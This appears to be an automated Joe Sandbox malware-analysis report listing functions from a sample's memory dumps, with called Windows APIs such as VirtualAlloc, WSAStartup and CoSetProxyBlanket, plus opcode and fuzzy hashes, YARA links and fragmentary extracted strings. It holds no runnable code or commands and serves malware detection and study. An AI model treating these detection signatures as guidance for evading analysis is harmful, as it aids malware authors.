Opcode ID: 5449fb41edd958c90976410b6a4ed463d07550201c5a50ce842c06cb33a95618
Instruction ID: 6909ab0b2c7e4f550fa5fd373566505b08c02e2a0dad2c31e8391ab4ec302e02
Opcode Fuzzy Hash: 5449fb41edd958c90976410b6a4ed463d07550201c5a50ce842c06cb33a95618
Instruction Fuzzy Hash: F94128B3F507081BDB0CAE698E927AEB5C75BC4714F0ED43D5889DB385ED785C064280

Function 00ACAE40 Relevance: 1.6, APIs: 1, Instructions: 75memoryCOMMON

Download Yara Rule

APIs

RtlFreeHeap.NTDLL(?,00000000,?), ref: 00ACAF13

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID: FreeHeap
String ID:
API String ID: 3298025750-0
Opcode ID: 990bd39804940c03396ce4af4c21bf88c6df1cb3b405494b27e0058dbbfc2dbf
Instruction ID: b8421cfdac6d5c43b77791a3b874eb3026015b10190c0a376d6b945e8cd06a42
Opcode Fuzzy Hash: 990bd39804940c03396ce4af4c21bf88c6df1cb3b405494b27e0058dbbfc2dbf
Instruction Fuzzy Hash: 3E11CB77F142904BC318CEB8ECA0B97FA93EBD4209F1E817CCD859B22ACA714D158280

Function 00ACD872 Relevance: 1.6, APIs: 1, Instructions: 68memoryCOMMON

Download Yara Rule

APIs

RtlReAllocateHeap.NTDLL(?,00000000,?,?), ref: 00ACD8FB

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 99a1e0d7cba0885fa917ce7621f2fe4db909d4761d941efa77ab2d6d232b01cf
Instruction ID: 4b794fed7fc4d9f55882c17f714b2c34483a93259d7316d9f73dfeba260b5bd9
Opcode Fuzzy Hash: 99a1e0d7cba0885fa917ce7621f2fe4db909d4761d941efa77ab2d6d232b01cf
Instruction Fuzzy Hash: 3B11A63AA883008FC700AFF4AC50767B7E0ABAA310F0A853CE59487251E67C890192D2

Function 00ACADE0 Relevance: 1.5, APIs: 1, Instructions: 38memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(?,00000000,?), ref: 00ACAE31

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: af1f23c4d3fa930c5b12943690f87ca8edce5fbd1ec83df8428f0cb7436f6785
Instruction ID: 111a89739d633b68c3bf3b2b7300812ca932123fb3c93ce2c1f9cea87fc288b6
Opcode Fuzzy Hash: af1f23c4d3fa930c5b12943690f87ca8edce5fbd1ec83df8428f0cb7436f6785
Instruction Fuzzy Hash: 21F0E9311083404BC71DDF24E896AAA7BA2EF86308F14896CD4864F1A5DA761C17CB85

Function 00AC1022 Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00AC106B

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: f91fb783313279521aa77a9d72dd9436db86d64841025ba7fe544c55807aa2cc
Instruction ID: a264bebbd705e50a8a4d0cf1c9ad469473d8cba56daf0fc6d65fc53cb05eef44
Opcode Fuzzy Hash: f91fb783313279521aa77a9d72dd9436db86d64841025ba7fe544c55807aa2cc
Instruction Fuzzy Hash: DAF0B7795093418FD711DF25D59970BBBE0BB88304F11891DE4955B390C7B699498FC2

Function 00ABF58B Relevance: 1.5, APIs: 1, Instructions: 24COMMON

Download Yara Rule

APIs

CoSetProxyBlanket.COMBASE ref: 00ABF5D4

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID: BlanketProxy
String ID:
API String ID: 3890896728-0
Opcode ID: 4ac73208840f1d55f39b7028db9386105802bb5959580c2477d776d9e1e82a7a
Instruction ID: f403269a45dcc86c7cd9dd1388e3a8ecf9ded36afc37e9f9131b8ad5df03414f
Opcode Fuzzy Hash: 4ac73208840f1d55f39b7028db9386105802bb5959580c2477d776d9e1e82a7a
Instruction Fuzzy Hash: 5FF0DAB4109701DFD305DF28C5A871ABBF0FB89304F00480CE0968B3A0CBB6A949CF82

Function 00A9DBB3 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

CoInitializeSecurity.COMBASE(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000), ref: 00A9DBC6

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID: InitializeSecurity
String ID:
API String ID: 640775948-0
Opcode ID: 73c20a8fb5f168dcfba064b2cbe228a397b109797da15a6c8dd542c6fe20df4b
Instruction ID: b4346f778c7619a6afa24926459345809814588a4ed8e89264a447bd23b8d2d9
Opcode Fuzzy Hash: 73c20a8fb5f168dcfba064b2cbe228a397b109797da15a6c8dd542c6fe20df4b
Instruction Fuzzy Hash: 75D095313D5342BAF2289688AC63F2023009302F28F300A09B3A3BE2D2C8D0B5228508

Function 00A9DB80 Relevance: 1.5, APIs: 1, Instructions: 18COMMON

Download Yara Rule

APIs

CoInitializeEx.COMBASE(00000000,00000002), ref: 00A9DB94

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID: Initialize
String ID:
API String ID: 2538663250-0
Opcode ID: 04b823bd2ffc9ac3642a7e9a83c6d431ef968bff0fd75d408f30574f4ab18827
Instruction ID: 07d5574eecaed09f1c3d7a4f4a2a7003ecf8622c7606b6401e483bce0234e733
Opcode Fuzzy Hash: 04b823bd2ffc9ac3642a7e9a83c6d431ef968bff0fd75d408f30574f4ab18827
Instruction Fuzzy Hash: 83D0A7211E114977D110E66CDC47F223B5CD30B768F044726B2A7D72D3DA506926C066

Function 00A9ABB8 Relevance: 1.5, APIs: 1, Instructions: 16networkCOMMON

Download Yara Rule

APIs

WSAStartup.WS2_32(00000202), ref: 00A9ABD1

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID: Startup
String ID:
API String ID: 724789610-0
Opcode ID: 80a9fc454462aef8966000424b60746c93ace764f6e9aa3491bd248f6bf7dec5
Instruction ID: 588335dcb0b03dfae247aca1715a78a75d5c7d0e811472ac4981ec55729bbb2d
Opcode Fuzzy Hash: 80a9fc454462aef8966000424b60746c93ace764f6e9aa3491bd248f6bf7dec5
Instruction Fuzzy Hash: B3D0A771A81152DBD604E7B0FCA7D1933099709389706003E6127C22B2DE2059165950

Function 00AED7E4 Relevance: 1.3, APIs: 1, Instructions: 21memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000), ref: 00AED7E9

Memory Dump Source

Source File: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 7053a06ee580cd2f817ff4f045e45f8635e0140f99bbae3d9902f9e8fb7340a8
Instruction ID: 4dcaea243b9286650330afb5b271a04f11eae7c6e82fff3ebff90978886640ad
Opcode Fuzzy Hash: 7053a06ee580cd2f817ff4f045e45f8635e0140f99bbae3d9902f9e8fb7340a8
Instruction Fuzzy Hash: 05E0B6F050C544DFEB487F29E9597BD7AF4EB04310F214A2DEBC6C9280E2760895DA5A

Function 00AED516 Relevance: 1.3, APIs: 1, Instructions: 17memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000), ref: 00AED945

Memory Dump Source

Source File: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: f8efac8a099ae3f281ebaff2910a0c0c911779b59a27da3a0adbd2ba5fcd7a7b
Instruction ID: 5a010656da5df7f28c0f45adf0ec5331ac04c7ac971a15cbe767f653110b0ad9
Opcode Fuzzy Hash: f8efac8a099ae3f281ebaff2910a0c0c911779b59a27da3a0adbd2ba5fcd7a7b
Instruction Fuzzy Hash: F7E0753550C549CFDB45BF6894492EEBBB0EF28311F210A08ECE597A50D3316C60CB87

Non-executed Functions

Function 00AA24F0 Relevance: 122.0, Strings: 96, Instructions: 2005COMMON

Download Yara Rule

Strings

G, xrefs: 00AA394F
D, xrefs: 00AA399F
K, xrefs: 00AA3190
V, xrefs: 00AA3680
f, xrefs: 00AA2D3F
7, xrefs: 00AA2D1F
D, xrefs: 00AA31C8
+, xrefs: 00AA38A8
C, xrefs: 00AA31D0
E, xrefs: 00AA3A87
E, xrefs: 00AA3A3F
g, xrefs: 00AA2E32
1, xrefs: 00AA2FE2
I, xrefs: 00AA31A0
Y, xrefs: 00AA2E2A
(, xrefs: 00AA301A
', xrefs: 00AA3DE1
%, xrefs: 00AA3DD1
G, xrefs: 00AA3A77
V, xrefs: 00AA3472
/, xrefs: 00AA3012
i, xrefs: 00AA2D17
C, xrefs: 00AA3A57
U, xrefs: 00AA39DF
^, xrefs: 00AA30D8
/, xrefs: 00AA3E21
), xrefs: 00AA38B8
4, xrefs: 00AA3D49
Z, xrefs: 00AA366C
], xrefs: 00AA3A0F
M, xrefs: 00AA3AC7
Q, xrefs: 00AA3AE7
D, xrefs: 00AA4367
B, xrefs: 00AA39AF
\, xrefs: 00AA30C8
A, xrefs: 00AA3658
K, xrefs: 00AA3A97
6, xrefs: 00AA2607
E, xrefs: 00AA31C0
), xrefs: 00AA3022
g, xrefs: 00AA2B32
m, xrefs: 00AA2CF7
h, xrefs: 00AA391F
D, xrefs: 00AA3F26
I, xrefs: 00AA3AA7
B, xrefs: 00AA364E
j, xrefs: 00AA3A8F
-, xrefs: 00AA3002
{, xrefs: 00AA2555
+, xrefs: 00AA3E01
q, xrefs: 00AA2CD7
X, xrefs: 00AA3A2F
g, xrefs: 00AA393F
Q, xrefs: 00AA396F
I, xrefs: 00AA269C
v, xrefs: 00AA2B3C
e, xrefs: 00AA3A9F
t, xrefs: 00AA3ACF
O, xrefs: 00AA398F
o, xrefs: 00AA2D07
O, xrefs: 00AA3AB7
;, xrefs: 00AA29C5
l, xrefs: 00AA3ABF
G, xrefs: 00AA31B0
*, xrefs: 00AA38B0
s, xrefs: 00AA2CE7
m, xrefs: 00AA392F
k, xrefs: 00AA2D27
Z, xrefs: 00AA3662
f, xrefs: 00AA2FDA
S, xrefs: 00AA3AD7
P, xrefs: 00AA3ADF
L, xrefs: 00AA397F
1, xrefs: 00AA3E31
P, xrefs: 00AA3676
g, xrefs: 00AA2D47
-, xrefs: 00AA3E11
f, xrefs: 00AA2E3A
N, xrefs: 00AA39EF
-, xrefs: 00AA2CCF
A, xrefs: 00AA3A67
e, xrefs: 00AA2D37
#, xrefs: 00AA3DC1
', xrefs: 00AA28B7
5|iL, xrefs: 00AA41E8
Q, xrefs: 00AA39FF
V, xrefs: 00AA395F
B, xrefs: 00AA25F7
;, xrefs: 00AA3D59
`, xrefs: 00AA3298
f, xrefs: 00AA34F7
3, xrefs: 00AA2FF2
j, xrefs: 00AA30B8
0, xrefs: 00AA3E29
!, xrefs: 00AA3DB1
), xrefs: 00AA3DF1

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_a90000_file.jbxd

Similarity

API ID:
String ID: !$#$%$'$'$($)$)$)$*$+$+$-$-$-$/$/$0$1$1$3$4$5|iL$6$7$;$;$A$A$B$B$B$C$C$D$D$D$D$E$E$E$G$G$G$I$I$I$K$K$L$M$N$O$O$P$P$Q$Q$Q$S$U$V$V$V$X$Y$Z$Z$\$]$^$`$e$e$f$f$f$f$g$g$g$g$h$i$j$j$k$l$m$m$o$q$s$t$v${
API String ID: 0-1857156078
Opcode ID: c720c46236af870f42885105178d51ce38c9027ef9809aba90c1f3d1fcdf51cb
Instruction ID: 58b059bead506c7567e04b819d5818d704d69ef19211b706ad9ea2d074e5acd1
Opcode Fuzzy Hash: c720c46236af870f42885105178d51ce38c9027ef9809aba90c1f3d1fcdf51cb
Instruction Fuzzy Hash: 8B13BE7150C7C18AD7358B38C4483AFBBE1ABD6324F188A6DE4E9873D2C77989458B53

Function 00AB42E2 Relevance: 34.2, Strings: 27, Instructions: 422COMMON

Download Yara Rule

Strings

y+U5, xrefs: 00AB4D23
XkVu, xrefs: 00AB4DD3
+C6M, xrefs: 00AB4D65
xy, xrefs: 00AB4C31
h;HE, xrefs: 00AB4D4F
#O3I, xrefs: 00AB4D70
W@, xrefs: 00AB4A9A
CsA}, xrefs: 00AB4DE9
A3C=, xrefs: 00AB4D39
SQ, xrefs: 00AB4A8F
*, xrefs: 00AB49F4
<[ae, xrefs: 00AB4DA7
GwKq, xrefs: 00AB4DDE
Yg_a, xrefs: 00AB4DB2
$S#], xrefs: 00AB4D91
/$, xrefs: 00AB49DE
&+, xrefs: 00AB49E9
AC, xrefs: 00AB44FF
\2, xrefs: 00AB4AA5
5G(A, xrefs: 00AB4D5A
"o i, xrefs: 00AB4DC8
I?Z9, xrefs: 00AB4D44
+W*Q, xrefs: 00AB4D86
H7B1, xrefs: 00AB4D2E
-_+Y, xrefs: 00AB4D9C
r1`3, xrefs: 00AB44BE
_c/m, xrefs: 00AB4DBD

Memory Dump Source

Source File: 00000000.00000002.1494605364.0000000000A91000.00000040.00000001.01000000.00000003.sdmp, Offset: 00A90000, based on PE: true

Associated: 00000000.00000002.1494587627.0000000000A90000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494605364.0000000000AD5000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494667449.0000000000AE7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000AE9000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000C77000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D5A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D86000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D8E000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494688218.0000000000D9C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1494989606.0000000000D9D000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495134022.0000000000F3C000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1495153455.0000000000F3D000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

